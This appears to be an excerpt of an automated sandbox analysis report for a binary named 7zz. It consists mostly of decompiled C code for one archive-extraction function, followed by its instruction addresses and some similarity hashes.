                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2507506473-0
                                                                                                                                    • Opcode ID: 529c86f540b2e3f00af20ac8cc2ba51f405252cf123252289ac745e0dd2c21fe
                                                                                                                                    • Instruction ID: 6733a5d0b54313f111c3d21430f7c760d78354a0b10c30e4881add0b2ce5f3d9
                                                                                                                                    • Opcode Fuzzy Hash: 529c86f540b2e3f00af20ac8cc2ba51f405252cf123252289ac745e0dd2c21fe
                                                                                                                                    • Instruction Fuzzy Hash: 12F06D78610301AAEB205BB3AC0572A36D0BB50792F25483BF804C85E4FB6889C4A61B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004290C5 Relevance: 2.1, APIs: 1, Instructions: 563COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                    			E004290C5(signed char __edx) {
				signed int _t311;
				signed char _t313;
				signed int _t315;
				signed char _t316;
				intOrPtr _t319;
				void* _t325;
				intOrPtr _t329;
				intOrPtr _t331;
				signed char _t332;
				intOrPtr _t337;
				signed char _t339;
				signed char _t344;
				intOrPtr _t345;
				signed char _t356;
				signed char _t357;
				signed char _t358;
				signed char _t361;
				signed char _t362;
				signed char _t367;
				signed char _t368;
				signed char _t369;
				signed char _t377;
				signed char _t378;
				signed char _t381;
				signed char _t382;
				signed char _t388;
				signed char _t389;
				signed char _t395;
				signed char _t397;
				signed char _t398;
				signed char _t402;
				signed char _t414;
				signed int _t422;
				intOrPtr _t430;
				intOrPtr _t439;
				signed char _t443;
				signed char _t449;
				signed char _t450;
				signed char _t451;
				signed int _t453;
				void* _t455;
				intOrPtr _t457;
				signed int _t472;
				intOrPtr _t526;
				signed char _t536;
				signed int _t538;
				intOrPtr* _t539;
				signed int _t542;
				intOrPtr _t546;
				signed char _t549;
				void* _t551;
				signed char _t552;
				signed int _t554;
				intOrPtr _t555;
				void* _t556;
				void* _t558;

				_t536 = __edx;
				_t311 = L0046B890(0x476cd8, _t556);
				_t449 = 0;
				 *(_t556 - 4) = 0;
				 *((char*)(_t556 - 0x60)) = _t311 & 0xffffff00 |  *(_t556 + 0x14) != 0x00000000;
				_t313 =  *(_t556 + 0x18);
				 *((intOrPtr*)(_t556 - 0x10)) = _t558 - 0x138;
				 *(_t556 + 0x18) = _t313;
				if(_t313 != 0) {
					 *((intOrPtr*)( *_t313 + 4))(_t313);
				}
				 *(_t556 - 4) = 1;
				 *(_t556 - 0x38) = _t449;
				 *(_t556 - 0x34) = _t449;
				 *((char*)(_t556 + 0x17)) =  *((intOrPtr*)(_t556 + 0x10)) == 0xffffffff;
				if( *((char*)(_t556 + 0x17)) != 0) {
					 *((intOrPtr*)(_t556 + 0x10)) =  *((intOrPtr*)( *(_t556 + 8) + 0xdc));
				}
				if( *((intOrPtr*)(_t556 + 0x10)) != _t449) {
					E00405B9F(_t556 - 0x30);
					 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
					_t315 = 0;
					__eflags = 0;
					 *(_t556 - 4) = 2;
					 *(_t556 - 0x18) = 0;
					while(1) {
						__eflags = _t315 -  *((intOrPtr*)(_t556 + 0x10));
						if(_t315 >=  *((intOrPtr*)(_t556 + 0x10))) {
							break;
						}
						__eflags =  *((char*)(_t556 + 0x17));
						if( *((char*)(_t556 + 0x17)) == 0) {
							_t315 =  *( *(_t556 + 0xc) + _t315 * 4);
						}
						_t544 =  *(_t556 + 8);
						 *(_t556 - 0x1c) = _t315;
						_t554 =  *( *((intOrPtr*)( *(_t556 + 8) + 0x228)) + _t315 * 4);
						__eflags = _t554 - 0xffffffff;
						if(_t554 != 0xffffffff) {
							_t422 =  *(_t556 - 0x28);
							__eflags = _t422 - _t449;
							if(_t422 == _t449) {
								L16:
								 *(_t556 - 0x90) =  *(_t556 - 0x90) | 0xffffffff;
								 *(_t556 - 0x8c) = _t554;
								E0042999D(_t556 - 0x88);
								 *(_t556 - 0x70) = _t449;
								 *(_t556 - 0x6c) = _t449;
								_push(_t556 - 0x90);
								 *(_t556 - 4) = 5;
								E004299F0(_t556 - 0x30);
								 *(_t556 - 4) = 2;
								E00408604(_t556 - 0x88);
								_t526 = E00429826( *((intOrPtr*)( *((intOrPtr*)(_t544 + 0xb8)) + _t554 * 4)));
								_t67 = _t556 - 0x38;
								 *_t67 =  *(_t556 - 0x38) + _t526;
								__eflags =  *_t67;
								_t430 =  *((intOrPtr*)( *((intOrPtr*)(_t556 - 0x24)) +  *(_t556 - 0x28) * 4 - 4));
								asm("adc [ebp-0x34], edx");
								 *((intOrPtr*)(_t430 + 0x20)) = _t526;
								 *(_t430 + 0x24) = _t536;
								L17:
								_t546 =  *((intOrPtr*)( *((intOrPtr*)(_t556 - 0x24)) +  *(_t556 - 0x28) * 4 - 4));
								_t457 =  *((intOrPtr*)( *((intOrPtr*)( *(_t556 + 8) + 0x214)) + _t554 * 4));
								_t555 =  *((intOrPtr*)(_t546 + 0x10));
								while(1) {
									_t435 =  *(_t556 - 0x1c) - _t457;
									__eflags = _t555 -  *(_t556 - 0x1c) - _t457;
									if(_t555 >  *(_t556 - 0x1c) - _t457) {
										goto L13;
									}
									_t87 = _t546 + 8; // 0xa
									L0043AC2F(_t87, _t435 & 0xffffff00 | __eflags == 0x00000000);
									_t555 = _t555 + 1;
								}
								goto L13;
							}
							_t439 =  *((intOrPtr*)( *((intOrPtr*)(_t556 - 0x24)) + _t422 * 4 - 4));
							__eflags = _t554 -  *((intOrPtr*)(_t439 + 4));
							if(_t554 ==  *((intOrPtr*)(_t439 + 4))) {
								goto L17;
							}
							goto L16;
						} else {
							_push(_t554);
							_push(_t315);
							_push(E004298B3(_t556 - 0x144));
							 *(_t556 - 4) = 3;
							E004299F0(_t556 - 0x30);
							 *(_t556 - 4) = 2;
							E00408604(_t556 - 0x13c);
							L13:
							_t315 =  *(_t556 - 0x18) + 1;
							_t449 = 0;
							 *(_t556 - 0x18) = _t315;
							continue;
						}
					}
					_t316 =  *(_t556 + 0x18);
					__eflags =  *((intOrPtr*)( *_t316 + 0xc))(_t316,  *(_t556 - 0x38),  *(_t556 - 0x34)) - _t449;
					if(__eflags == 0) {
						E00426448(_t556 - 0x11c, __eflags, 1);
						_push(0x38);
						 *(_t556 - 4) = 7;
						 *(_t556 - 0x44) = _t449;
						 *(_t556 - 0x40) = _t449;
						 *(_t556 - 0x4c) = _t449;
						 *(_t556 - 0x48) = _t449;
						_t319 = L004079F2();
						 *((intOrPtr*)(_t556 + 0x10)) = _t319;
						__eflags = _t319 - _t449;
						 *(_t556 - 4) = 8;
						if(_t319 == _t449) {
							_t549 = 0;
							__eflags = 0;
						} else {
							_t549 = L0040F3E5(_t319);
						}
						__eflags = _t549 - _t449;
						 *(_t556 - 4) = 7;
						 *(_t556 - 0x34) = _t549;
						 *(_t556 - 0x14) = _t549;
						if(_t549 != _t449) {
							 *((intOrPtr*)( *_t549 + 4))(_t549);
						}
						_push(_t449);
						 *(_t556 - 4) = 9;
						L0040F478(_t549,  *(_t556 + 0x18));
						_t538 = 0;
						__eflags = 0;
						 *(_t556 - 0x1c) = 0;
						while(1) {
							 *(_t549 + 0x28) =  *(_t556 - 0x4c);
							 *(_t549 + 0x2c) =  *(_t556 - 0x48);
							 *(_t549 + 0x20) =  *(_t556 - 0x44);
							 *(_t549 + 0x24) =  *(_t556 - 0x40);
							_t325 = L0040F554(_t549);
							__eflags = _t325 - _t449;
							if(_t325 != _t449) {
								break;
							}
							__eflags = _t538 -  *(_t556 - 0x28);
							if(_t538 <  *(_t556 - 0x28)) {
								_push(0x38);
								 *(_t556 - 0x54) = _t449;
								 *(_t556 - 0x50) = _t449;
								_t539 =  *((intOrPtr*)( *((intOrPtr*)(_t556 - 0x24)) + _t538 * 4));
								 *((intOrPtr*)(_t556 - 0x5c)) =  *((intOrPtr*)(_t539 + 0x20));
								 *((intOrPtr*)(_t556 - 0x58)) =  *((intOrPtr*)(_t539 + 0x24));
								_t329 = L004079F2();
								 *((intOrPtr*)(_t556 - 0x3c)) = _t329;
								__eflags = _t329 - _t449;
								 *(_t556 - 4) = 0xb;
								if(_t329 == _t449) {
									_t450 = 0;
									__eflags = 0;
								} else {
									_t450 = E00429F42(_t329);
								}
								__eflags = _t450;
								 *(_t556 - 0x18) = _t450;
								 *(_t556 - 4) = 9;
								 *(_t556 + 0x14) = _t450;
								if(_t450 != 0) {
									 *((intOrPtr*)( *_t450 + 4))(_t450);
								}
								 *(_t556 - 4) = 0xc;
								_t551 =  *(_t556 + 8) + 0x70;
								_t331 =  *_t539;
								__eflags = _t331 - 0xffffffff;
								if(_t331 == 0xffffffff) {
									_t331 =  *((intOrPtr*)( *((intOrPtr*)(_t551 + 0x1a4)) +  *(_t539 + 4) * 4));
								}
								__eflags =  *( *(_t556 + 8) + 0x14);
								_t332 = E0042A06F(_t450, _t551, 0, _t331, _t539 + 8,  *(_t556 + 0x18),  *((intOrPtr*)(_t556 - 0x60)),  *(_t556 + 8) & 0xffffff00 |  *( *(_t556 + 8) + 0x14) != 0x00000000); // executed
								_t451 = _t332;
								__eflags = _t451;
								if(_t451 == 0) {
									__eflags =  *_t539 - 0xffffffff;
									if( *_t539 == 0xffffffff) {
										_t453 =  *(_t539 + 4) << 2;
										 *((intOrPtr*)(_t556 - 0x3c)) =  *((intOrPtr*)( *((intOrPtr*)(_t551 + 0x48)) + _t453));
										 *(_t556 - 0x54) = E00429872(_t551,  *(_t539 + 4));
										 *(_t556 - 0x50) = _t536;
										_t337 =  *((intOrPtr*)(_t551 + 0x17c));
										_t542 =  *( *((intOrPtr*)(_t551 + 0x190)) + _t453) << 3;
										_t455 =  *((intOrPtr*)(_t337 + _t542)) +  *((intOrPtr*)(_t551 + 0x148));
										asm("adc eax, [esi+0x14c]");
										 *(_t556 + 0xc) =  *(_t556 + 0xc) & 0x00000000;
										 *((intOrPtr*)(_t556 - 0x64)) =  *((intOrPtr*)(_t337 + _t542 + 4));
										_t339 =  *(_t556 + 0x18);
										 *(_t556 - 4) = 0xe;
										__eflags = _t339;
										if(__eflags != 0) {
											_t536 = _t556 + 0xc;
											 *((intOrPtr*)( *_t339))(_t339, 0x47a578, _t536);
										}
										 *(_t556 - 4) = 0xf;
										_t344 = E004264F7(_t556 - 0x11c, __eflags,  *((intOrPtr*)( *(_t556 + 8) + 0x6c)), _t455,  *((intOrPtr*)(_t556 - 0x64)),  *((intOrPtr*)(_t551 + 0xc)) + _t542,  *((intOrPtr*)(_t556 - 0x3c)),  *(_t556 + 0x14),  *(_t556 - 0x14),  *(_t556 + 0xc), _t556 + 0x13, 1,  *((intOrPtr*)( *(_t556 + 8) + 0x10))); // executed
										_t552 = _t344;
										__eflags = _t552 - 1;
										if(_t552 != 1) {
											__eflags = _t552 - 0x80004001;
											if(_t552 != 0x80004001) {
												__eflags = _t552;
												if(_t552 == 0) {
													_t472 =  *(_t556 - 0x18);
													_t345 =  *((intOrPtr*)(_t472 + 0x18));
													__eflags =  *((intOrPtr*)(_t472 + 0x28)) -  *((intOrPtr*)(_t345 + 8));
													if( *((intOrPtr*)(_t472 + 0x28)) ==  *((intOrPtr*)(_t345 + 8))) {
														 *(_t556 - 4) = 0xc;
														L0043361B(_t556 + 0xc);
														 *(_t556 - 4) = 9;
														L0043361B(_t556 + 0x14);
														goto L104;
													}
													_t552 = E0042A381(_t472, _t556, 2);
													 *(_t556 - 4) = 0xc;
													__eflags = _t552;
													if(_t552 == 0) {
														L0043361B(_t556 + 0xc);
														 *(_t556 - 4) = 9;
														L0043361B(_t556 + 0x14);
														goto L101;
													}
													_t356 =  *(_t556 + 0xc);
													__eflags = _t356;
													if(_t356 != 0) {
														 *((intOrPtr*)( *_t356 + 8))(_t356);
													}
													_t357 =  *(_t556 + 0x14);
													 *(_t556 - 4) = 9;
													__eflags = _t357;
													if(_t357 != 0) {
														 *((intOrPtr*)( *_t357 + 8))(_t357);
													}
													_t358 =  *(_t556 - 0x14);
													 *(_t556 - 4) = 7;
													__eflags = _t358;
													if(__eflags != 0) {
														 *((intOrPtr*)( *_t358 + 8))(_t358);
													}
													 *(_t556 - 4) = 2;
													E00429925(_t556 - 0x11c, __eflags);
													 *(_t556 - 4) = 1;
													E004299B8(_t556 - 0x30);
													goto L96;
												}
												_t367 =  *(_t556 + 0xc);
												 *(_t556 - 4) = 0xc;
												__eflags = _t367;
												if(_t367 != 0) {
													 *((intOrPtr*)( *_t367 + 8))(_t367);
												}
												_t368 =  *(_t556 + 0x14);
												 *(_t556 - 4) = 9;
												__eflags = _t368;
												if(_t368 != 0) {
													 *((intOrPtr*)( *_t368 + 8))(_t368);
												}
												_t369 =  *(_t556 - 0x14);
												 *(_t556 - 4) = 7;
												__eflags = _t369;
												if(__eflags != 0) {
													 *((intOrPtr*)( *_t369 + 8))(_t369);
												}
												 *(_t556 - 4) = 2;
												E00429925(_t556 - 0x11c, __eflags);
												 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
												 *(_t556 - 4) = 0x12;
												goto L65;
											}
											_t552 = E0042A381( *(_t556 - 0x18), _t556, 1);
											_t377 =  *(_t556 + 0xc);
											__eflags = _t552;
											 *(_t556 - 4) = 0xc;
											if(_t552 == 0) {
												goto L75;
											}
											__eflags = _t377;
											if(_t377 != 0) {
												 *((intOrPtr*)( *_t377 + 8))(_t377);
											}
											_t381 =  *(_t556 + 0x14);
											 *(_t556 - 4) = 9;
											__eflags = _t381;
											if(_t381 != 0) {
												 *((intOrPtr*)( *_t381 + 8))(_t381);
											}
											_t382 =  *(_t556 - 0x14);
											 *(_t556 - 4) = 7;
											__eflags = _t382;
											if(__eflags != 0) {
												 *((intOrPtr*)( *_t382 + 8))(_t382);
											}
											 *(_t556 - 4) = 2;
											E00429925(_t556 - 0x11c, __eflags);
											 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
											 *(_t556 - 4) = 0x11;
											goto L65;
										} else {
											_t552 = E0042A381( *(_t556 - 0x18), _t556, 2);
											_t377 =  *(_t556 + 0xc);
											__eflags = _t552;
											 *(_t556 - 4) = 0xc;
											if(_t552 == 0) {
												L75:
												__eflags = _t377;
												if(_t377 != 0) {
													 *((intOrPtr*)( *_t377 + 8))(_t377);
												}
												_t378 =  *(_t556 + 0x14);
												 *(_t556 - 4) = 9;
												__eflags = _t378;
												if(_t378 != 0) {
													 *((intOrPtr*)( *_t378 + 8))(_t378);
												}
												L101:
												 *(_t556 - 4) = 9;
												L104:
												 *(_t556 - 0x1c) =  *(_t556 - 0x1c) + 1;
												 *(_t556 - 0x4c) =  *(_t556 - 0x4c) +  *((intOrPtr*)(_t556 - 0x5c));
												_t549 =  *(_t556 - 0x34);
												_t538 =  *(_t556 - 0x1c);
												asm("adc [ebp-0x48], eax");
												 *(_t556 - 0x44) =  *(_t556 - 0x44) +  *(_t556 - 0x54);
												asm("adc [ebp-0x40], eax");
												_t449 = 0;
												continue;
											}
											__eflags = _t377;
											if(_t377 != 0) {
												 *((intOrPtr*)( *_t377 + 8))(_t377);
											}
											_t388 =  *(_t556 + 0x14);
											 *(_t556 - 4) = 9;
											__eflags = _t388;
											if(_t388 != 0) {
												 *((intOrPtr*)( *_t388 + 8))(_t388);
											}
											_t389 =  *(_t556 - 0x14);
											 *(_t556 - 4) = 7;
											__eflags = _t389;
											if(__eflags != 0) {
												 *((intOrPtr*)( *_t389 + 8))(_t389);
											}
											 *(_t556 - 4) = 2;
											E00429925(_t556 - 0x11c, __eflags);
											 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
											 *(_t556 - 4) = 0x10;
											L65:
											E0040862D();
											 *(_t556 - 4) = 1;
											E00408604(_t556 - 0x30);
											L96:
											_t361 =  *(_t556 + 0x18);
											 *(_t556 - 4) =  *(_t556 - 4) & 0x00000000;
											__eflags = _t361;
											L97:
											if(__eflags != 0) {
												 *((intOrPtr*)( *_t361 + 8))(_t361);
											}
											_t362 = _t552;
											goto L105;
										}
									}
									_t395 =  *(_t556 + 0x14);
									 *(_t556 - 4) = 9;
									__eflags = _t395;
									if(_t395 != 0) {
										 *((intOrPtr*)( *_t395 + 8))(_t395);
									}
									goto L104;
								} else {
									_t397 =  *(_t556 + 0x14);
									 *(_t556 - 4) = 9;
									__eflags = _t397;
									if(_t397 != 0) {
										 *((intOrPtr*)( *_t397 + 8))(_t397);
									}
									_t398 =  *(_t556 - 0x14);
									 *(_t556 - 4) = 7;
									__eflags = _t398;
									if(__eflags != 0) {
										 *((intOrPtr*)( *_t398 + 8))(_t398);
									}
									 *(_t556 - 4) = 2;
									E00429925(_t556 - 0x11c, __eflags);
									 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
									 *(_t556 - 4) = 0xd;
									E0040862D();
									 *(_t556 - 4) = 1;
									E00408604(_t556 - 0x30);
									_t402 =  *(_t556 + 0x18);
									 *(_t556 - 4) =  *(_t556 - 4) & 0x00000000;
									__eflags = _t402;
									if(_t402 != 0) {
										 *((intOrPtr*)( *_t402 + 8))(_t402);
									}
									_t362 = _t451;
									goto L105;
								}
							}
							 *(_t556 - 4) = 7;
							L0043361B(_t556 - 0x14);
							 *(_t556 - 4) = 2;
							E00429925(_t556 - 0x11c, __eflags); // executed
							 *(_t556 - 4) = 1;
							E004299B8(_t556 - 0x30);
							_t137 = _t556 - 4;
							 *_t137 =  *(_t556 - 4) & 0x00000000;
							__eflags =  *_t137;
							L0043361B(_t556 + 0x18);
							goto L35;
						}
						_t414 =  *(_t556 - 0x14);
						 *(_t556 - 4) = 7;
						__eflags = _t414 - _t449;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t414 + 8))(_t414);
						}
						 *(_t556 - 4) = 2;
						E00429925(_t556 - 0x11c, __eflags);
						 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
						 *(_t556 - 4) = 0xa;
						L22:
						E0040862D();
						 *(_t556 - 4) = 1;
						E00408604(_t556 - 0x30);
						_t361 =  *(_t556 + 0x18);
						 *(_t556 - 4) =  *(_t556 - 4) & 0x00000000;
						__eflags = _t361 - _t449;
						goto L97;
					}
					 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
					 *(_t556 - 4) = 6;
					goto L22;
				} else {
					_t443 =  *(_t556 + 0x18);
					 *(_t556 - 4) =  *(_t556 - 4) & 0x00000000;
					if(_t443 != _t449) {
						 *((intOrPtr*)( *_t443 + 8))(_t443);
					}
					L35:
					_t362 = 0;
					L105:
					 *[fs:0x0] =  *((intOrPtr*)(_t556 - 0xc));
					return _t362;
				}
			}



























































                                                                                                                                    0x004290c5
                                                                                                                                    0x004290ca
                                                                                                                                    0x004290d6
                                                                                                                                    0x004290dd
                                                                                                                                    0x004290e3
                                                                                                                                    0x004290e6
                                                                                                                                    0x004290eb
                                                                                                                                    0x004290ee
                                                                                                                                    0x004290f1
                                                                                                                                    0x004290f6
                                                                                                                                    0x004290f6
                                                                                                                                    0x004290fd
                                                                                                                                    0x00429101
                                                                                                                                    0x00429104
                                                                                                                                    0x00429107
                                                                                                                                    0x0042910f
                                                                                                                                    0x0042911a
                                                                                                                                    0x0042911a
                                                                                                                                    0x00429120
                                                                                                                                    0x0042913f
                                                                                                                                    0x00429144
                                                                                                                                    0x0042914b
                                                                                                                                    0x0042914b
                                                                                                                                    0x0042914d
                                                                                                                                    0x00429151
                                                                                                                                    0x00429154
                                                                                                                                    0x00429154
                                                                                                                                    0x00429157
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042915d
                                                                                                                                    0x00429161
                                                                                                                                    0x00429166
                                                                                                                                    0x00429166
                                                                                                                                    0x00429169
                                                                                                                                    0x0042916c
                                                                                                                                    0x00429175
                                                                                                                                    0x00429178
                                                                                                                                    0x0042917b
                                                                                                                                    0x004291b1
                                                                                                                                    0x004291b4
                                                                                                                                    0x004291b6
                                                                                                                                    0x004291c4
                                                                                                                                    0x004291c4
                                                                                                                                    0x004291d1
                                                                                                                                    0x004291d7
                                                                                                                                    0x004291dc
                                                                                                                                    0x004291df
                                                                                                                                    0x004291eb
                                                                                                                                    0x004291ec
                                                                                                                                    0x004291f0
                                                                                                                                    0x004291fb
                                                                                                                                    0x004291ff
                                                                                                                                    0x00429215
                                                                                                                                    0x0042921a
                                                                                                                                    0x0042921a
                                                                                                                                    0x0042921a
                                                                                                                                    0x0042921d
                                                                                                                                    0x00429221
                                                                                                                                    0x00429224
                                                                                                                                    0x00429227
                                                                                                                                    0x0042922a
                                                                                                                                    0x00429230
                                                                                                                                    0x0042923d
                                                                                                                                    0x00429240
                                                                                                                                    0x00429243
                                                                                                                                    0x00429246
                                                                                                                                    0x00429248
                                                                                                                                    0x0042924a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00429254
                                                                                                                                    0x00429257
                                                                                                                                    0x0042925c
                                                                                                                                    0x0042925c
                                                                                                                                    0x00000000
                                                                                                                                    0x00429243
                                                                                                                                    0x004291bb
                                                                                                                                    0x004291bf
                                                                                                                                    0x004291c2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042917d
                                                                                                                                    0x0042917d
                                                                                                                                    0x0042917e
                                                                                                                                    0x0042918a
                                                                                                                                    0x0042918e
                                                                                                                                    0x00429192
                                                                                                                                    0x0042919d
                                                                                                                                    0x004291a1
                                                                                                                                    0x004291a6
                                                                                                                                    0x004291a9
                                                                                                                                    0x004291aa
                                                                                                                                    0x004291ac
                                                                                                                                    0x00000000
                                                                                                                                    0x004291ac
                                                                                                                                    0x0042917b
                                                                                                                                    0x00429262
                                                                                                                                    0x00429270
                                                                                                                                    0x00429272
                                                                                                                                    0x004292a9
                                                                                                                                    0x004292ae
                                                                                                                                    0x004292b0
                                                                                                                                    0x004292b4
                                                                                                                                    0x004292b7
                                                                                                                                    0x004292ba
                                                                                                                                    0x004292bd
                                                                                                                                    0x004292c0
                                                                                                                                    0x004292c6
                                                                                                                                    0x004292c9
                                                                                                                                    0x004292cb
                                                                                                                                    0x004292cf
                                                                                                                                    0x004292dc
                                                                                                                                    0x004292dc
                                                                                                                                    0x004292d1
                                                                                                                                    0x004292d8
                                                                                                                                    0x004292d8
                                                                                                                                    0x004292de
                                                                                                                                    0x004292e0
                                                                                                                                    0x004292e4
                                                                                                                                    0x004292e7
                                                                                                                                    0x004292ea
                                                                                                                                    0x004292ef
                                                                                                                                    0x004292ef
                                                                                                                                    0x004292f2
                                                                                                                                    0x004292f8
                                                                                                                                    0x004292fc
                                                                                                                                    0x00429301
                                                                                                                                    0x00429301
                                                                                                                                    0x00429303
                                                                                                                                    0x00429306
                                                                                                                                    0x0042930b
                                                                                                                                    0x00429311
                                                                                                                                    0x00429317
                                                                                                                                    0x0042931d
                                                                                                                                    0x00429320
                                                                                                                                    0x00429327
                                                                                                                                    0x00429329
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042935b
                                                                                                                                    0x0042935e
                                                                                                                                    0x0042939d
                                                                                                                                    0x0042939f
                                                                                                                                    0x004293a2
                                                                                                                                    0x004293a5
                                                                                                                                    0x004293ab
                                                                                                                                    0x004293b1
                                                                                                                                    0x004293b4
                                                                                                                                    0x004293ba
                                                                                                                                    0x004293bd
                                                                                                                                    0x004293bf
                                                                                                                                    0x004293c3
                                                                                                                                    0x004293d0
                                                                                                                                    0x004293d0
                                                                                                                                    0x004293c5
                                                                                                                                    0x004293cc
                                                                                                                                    0x004293cc
                                                                                                                                    0x004293d2
                                                                                                                                    0x004293d4
                                                                                                                                    0x004293d7
                                                                                                                                    0x004293db
                                                                                                                                    0x004293de
                                                                                                                                    0x004293e3
                                                                                                                                    0x004293e3
                                                                                                                                    0x004293e9
                                                                                                                                    0x004293ed
                                                                                                                                    0x004293f0
                                                                                                                                    0x004293f2
                                                                                                                                    0x004293f5
                                                                                                                                    0x00429400
                                                                                                                                    0x00429400
                                                                                                                                    0x00429406
                                                                                                                                    0x0042941e
                                                                                                                                    0x00429423
                                                                                                                                    0x00429425
                                                                                                                                    0x00429427
                                                                                                                                    0x00429491
                                                                                                                                    0x00429494
                                                                                                                                    0x004294b9
                                                                                                                                    0x004294c1
                                                                                                                                    0x004294c9
                                                                                                                                    0x004294d2
                                                                                                                                    0x004294d8
                                                                                                                                    0x004294de
                                                                                                                                    0x004294e4
                                                                                                                                    0x004294ee
                                                                                                                                    0x004294f4
                                                                                                                                    0x004294f8
                                                                                                                                    0x004294fb
                                                                                                                                    0x004294fe
                                                                                                                                    0x00429502
                                                                                                                                    0x00429504
                                                                                                                                    0x00429508
                                                                                                                                    0x00429512
                                                                                                                                    0x00429512
                                                                                                                                    0x00429517
                                                                                                                                    0x00429544
                                                                                                                                    0x00429549
                                                                                                                                    0x0042954b
                                                                                                                                    0x0042954e
                                                                                                                                    0x004295ca
                                                                                                                                    0x004295d0
                                                                                                                                    0x0042965c
                                                                                                                                    0x0042965e
                                                                                                                                    0x004296b2
                                                                                                                                    0x004296b5
                                                                                                                                    0x004296bb
                                                                                                                                    0x004296be
                                                                                                                                    0x00429754
                                                                                                                                    0x004297d1
                                                                                                                                    0x004297d9
                                                                                                                                    0x004297dd
                                                                                                                                    0x00000000
                                                                                                                                    0x004297dd
                                                                                                                                    0x004296cb
                                                                                                                                    0x004296cd
                                                                                                                                    0x004296d1
                                                                                                                                    0x004296d3
                                                                                                                                    0x0042973a
                                                                                                                                    0x00429742
                                                                                                                                    0x00429746
                                                                                                                                    0x00000000
                                                                                                                                    0x00429746
                                                                                                                                    0x004296d5
                                                                                                                                    0x004296d8
                                                                                                                                    0x004296da
                                                                                                                                    0x004296df
                                                                                                                                    0x004296df
                                                                                                                                    0x004296e2
                                                                                                                                    0x004296e5
                                                                                                                                    0x004296e9
                                                                                                                                    0x004296eb
                                                                                                                                    0x004296f0
                                                                                                                                    0x004296f0
                                                                                                                                    0x004296f3
                                                                                                                                    0x004296f6
                                                                                                                                    0x004296fa
                                                                                                                                    0x004296fc
                                                                                                                                    0x00429701
                                                                                                                                    0x00429701
                                                                                                                                    0x0042970a
                                                                                                                                    0x0042970e
                                                                                                                                    0x00429716
                                                                                                                                    0x0042971a
                                                                                                                                    0x00000000
                                                                                                                                    0x0042971a
                                                                                                                                    0x00429660
                                                                                                                                    0x00429663
                                                                                                                                    0x00429667
                                                                                                                                    0x00429669
                                                                                                                                    0x0042966e
                                                                                                                                    0x0042966e
                                                                                                                                    0x00429671
                                                                                                                                    0x00429674
                                                                                                                                    0x00429678
                                                                                                                                    0x0042967a
                                                                                                                                    0x0042967f
                                                                                                                                    0x0042967f
                                                                                                                                    0x00429682
                                                                                                                                    0x00429685
                                                                                                                                    0x00429689
                                                                                                                                    0x0042968b
                                                                                                                                    0x00429690
                                                                                                                                    0x00429690
                                                                                                                                    0x00429699
                                                                                                                                    0x0042969d
                                                                                                                                    0x004296a2
                                                                                                                                    0x004296a9
                                                                                                                                    0x00000000
                                                                                                                                    0x004296a9
                                                                                                                                    0x004295e0
                                                                                                                                    0x004295e2
                                                                                                                                    0x004295e5
                                                                                                                                    0x004295e7
                                                                                                                                    0x004295eb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004295ed
                                                                                                                                    0x004295ef
                                                                                                                                    0x004295f4
                                                                                                                                    0x004295f4
                                                                                                                                    0x004295f7
                                                                                                                                    0x004295fa
                                                                                                                                    0x004295fe
                                                                                                                                    0x00429600
                                                                                                                                    0x00429605
                                                                                                                                    0x00429605
                                                                                                                                    0x00429608
                                                                                                                                    0x0042960b
                                                                                                                                    0x0042960f
                                                                                                                                    0x00429611
                                                                                                                                    0x00429616
                                                                                                                                    0x00429616
                                                                                                                                    0x0042961f
                                                                                                                                    0x00429623
                                                                                                                                    0x00429628
                                                                                                                                    0x0042962f
                                                                                                                                    0x00000000
                                                                                                                                    0x00429550
                                                                                                                                    0x0042955a
                                                                                                                                    0x0042955c
                                                                                                                                    0x0042955f
                                                                                                                                    0x00429561
                                                                                                                                    0x00429565
                                                                                                                                    0x00429638
                                                                                                                                    0x00429638
                                                                                                                                    0x0042963a
                                                                                                                                    0x0042963f
                                                                                                                                    0x0042963f
                                                                                                                                    0x00429642
                                                                                                                                    0x00429645
                                                                                                                                    0x00429649
                                                                                                                                    0x0042964b
                                                                                                                                    0x00429654
                                                                                                                                    0x00429654
                                                                                                                                    0x0042974b
                                                                                                                                    0x0042974b
                                                                                                                                    0x004297e2
                                                                                                                                    0x004297e5
                                                                                                                                    0x004297e8
                                                                                                                                    0x004297ee
                                                                                                                                    0x004297f1
